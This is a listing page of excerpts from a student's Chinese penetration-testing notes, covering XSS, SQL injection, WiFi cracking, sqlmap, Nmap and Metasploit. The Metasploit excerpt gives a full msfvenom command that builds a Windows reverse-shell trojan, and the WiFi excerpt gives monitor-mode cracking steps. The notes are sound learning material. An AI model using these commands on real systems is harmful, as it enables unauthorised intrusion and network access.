![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
菜鸟的个人笔记
文章平均质量分 65
小洋葱头头
渗透测试小白一个,博客就当学习时的个人笔记写写,本人也是学生,文章中如有错误的地方还请指出,谢谢。
展开
-
XSS漏洞笔记
XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。原创 2022-09-22 16:48:51 · 1061 阅读 · 1 评论 -
文件上传漏洞及绕过方法笔记
文件上传漏洞及绕过方法个人笔记。原创 2022-09-01 16:00:37 · 814 阅读 · 1 评论 -
SQL注入-HTTP头的一些注入
有时因为需要,会将客户的请求头中一些数据与数据库进行交互,比如用户的cookie,统计用户点击链接的来源referer,统计用户操作系统User-Agent,和用户的真实地址,忘记对其添加过滤,就造成了注入漏洞。...原创 2022-08-16 18:33:57 · 1450 阅读 · 2 评论 -
SQL注入-宽字节注入
为防止SQL注入,一般都会开启gpc来过滤特殊字符,但如果数据库设置字节解析与PHP不同,并试用了宽字节字符集,就会导致宽字节注入,从而逃避gpc。(GBK和Big5等)原创 2022-08-16 12:16:29 · 833 阅读 · 0 评论 -
SQL注入-二次注入攻击
二次注入漏洞是一种在 Web 应用程序中广泛存在的安全漏洞形式,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助其他函数进行过滤,这些函数会在特殊字符前加\造成过滤的效果,但是\并不会插入在数据库中,我们输入的东西会原样储存到数据库中,虽然防止了一次注入,但如果可以二次使用该数据时,就有可能造成注入。二次注入通常存在用户注册->修改密码,邮箱注册->修改密码,文章添加->文章编辑。...原创 2022-08-16 09:26:34 · 422 阅读 · 0 评论 -
SQL注入-堆叠注入
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...原创 2022-08-15 17:22:17 · 1384 阅读 · 0 评论 -
SQL注入-报错注入
SQL注入-报错注入原创 2022-08-15 13:34:36 · 991 阅读 · 0 评论 -
SQL注入-盲注
SQL注入-盲注原创 2022-08-12 11:15:01 · 703 阅读 · 0 评论 -
SQL注入-联合查询注入
SQL注入-联合查询注入原创 2022-08-10 10:36:43 · 3514 阅读 · 0 评论 -
反射型xss钓鱼盗取用户cookie
演示用靶场:dvwa原创 2022-01-16 20:15:53 · 4430 阅读 · 0 评论 -
利用kali Linux破解WiFi密码
准备工具: 一:kali linux系统 二:外置无线网卡(需支持监听) 三:强大的密码字典第一步:设置无线网卡为(monitor)监听模式: ifconfig wlan0 down # 关闭网卡 iwconfig wlan0 mode monitor # 启动监听 ifconfig wlan0 up # 启动网卡第二步:开始监听:airodump-ng wlan0找到我们的目标(我手机热点),第三步:我们只需要记住目标WiFi的bssid与信道(ch)就行了,通过命令原创 2022-01-07 12:58:35 · 9603 阅读 · 1 评论 -
sqlmap基础
指令一览: 启动:sqlmap -h 指定url: -u /--url --batch 使用默认配置 -m 指定文件 -D 指定数据库 -T 指定表 -C 指定字段 -dbs 探测数据库 --tables 探测数据库表名 --columns 探测字段名 --user 探测数据库用户名 -r 指定http请求文件 --level2 指定探测级别 --technique=B 检测sql注入的类型 B:布尔盲注 E:报错注入 U:联合查询注入 S:注册表相关注入原创 2021-12-08 17:20:13 · 3282 阅读 · 0 评论 -
Burp Suite暴力破解网站密码
一、准备:1,靶场:个人选择DVWA。2,工具:Burp Suite。3,密码字典。二、开搞!:注:任何未经授权的渗透测试皆为违法,本文仅供学习,维护网络安全人人有责。一、打开dvwa暴力破解页面:...原创 2021-11-22 23:36:31 · 15030 阅读 · 5 评论 -
Metasploit中search命令
search命令用法老是忘,又很重要。命令:search [options]:<keywords>:查找,搜索。(可用关键字:name,rank(等级),path(路径),platform(平台),type(类型),cve)举例:一,后面直接跟上搜索内容:这种办法查找,将列出所有含有‘apache’字符串的。二,name关键字name关键字,将列出所有名字中含有apache的。三,rank(等级)关键字等级排序:excellent >great>good &g原创 2021-11-16 20:18:00 · 2857 阅读 · 0 评论 -
kali使用msf简单制作木马
命令:废话不多说,直接上命令:msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe命令分解: msfvenom #使用msf中msfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p原创 2021-11-15 22:58:21 · 12413 阅读 · 6 评论 -
Google黑客常用搜索语法
搜索语法:``` site ---搜索指定域名有联系的url inurl ---搜索包含指定字符的url info ---查询网站的一些信息 link ---查询指定域名链接 intext ---正文中具有指定内容 filetype ---指定文件类型 intitle ---搜索标题中包含指定关键字的网页```举例:Site:搜索Site:www.baidu.com,会出现与百度有联系的url。inurl:搜索’后台 inurl:admin_login.php’,会出现u原创 2021-11-04 19:52:52 · 4484 阅读 · 0 评论 -
Nmap常用扫描命令
分解命令''' -v #查看冗余信息 -p #E扫描端口 -sS #半开扫描*** -O #扫描操作系统 --randomize-hosts #指定网段内随即扫描 --scan-delay #延时扫描,单位为秒 -A #完全扫描 -T4 #指定等级的时许扫描,共六个级别,等级越高,速度越快越不安全 -sU #UDP扫描 -Pn #非ping扫 -sn #ping扫(速度快,不安全) -F #快速扫 -traceroute #路由跟踪'''举例:列原创 2021-10-31 19:38:35 · 3330 阅读 · 0 评论 -
21年新版kali安装
第一步:官网下载kali镜像文件官网地址:www.kali.org访问kali官网,点击上方GET KALI,然后点击Bare Metal,(旁边的Virtual Machines是专门为虚拟机设计的,相比更为轻量,安装过程也比较简单,下载下来就是虚拟机文件,只需要VMware扫描一下虚拟机就可以了,这里只说Bare Metal版本安装)。选择版本下载镜像第二步:VMware安装kali镜像下载完成后我们获得了kali的iso镜像文件,接下来去VMware进行下一步操作。首先打开我们的VM原创 2021-10-27 00:03:44 · 9861 阅读 · 4 评论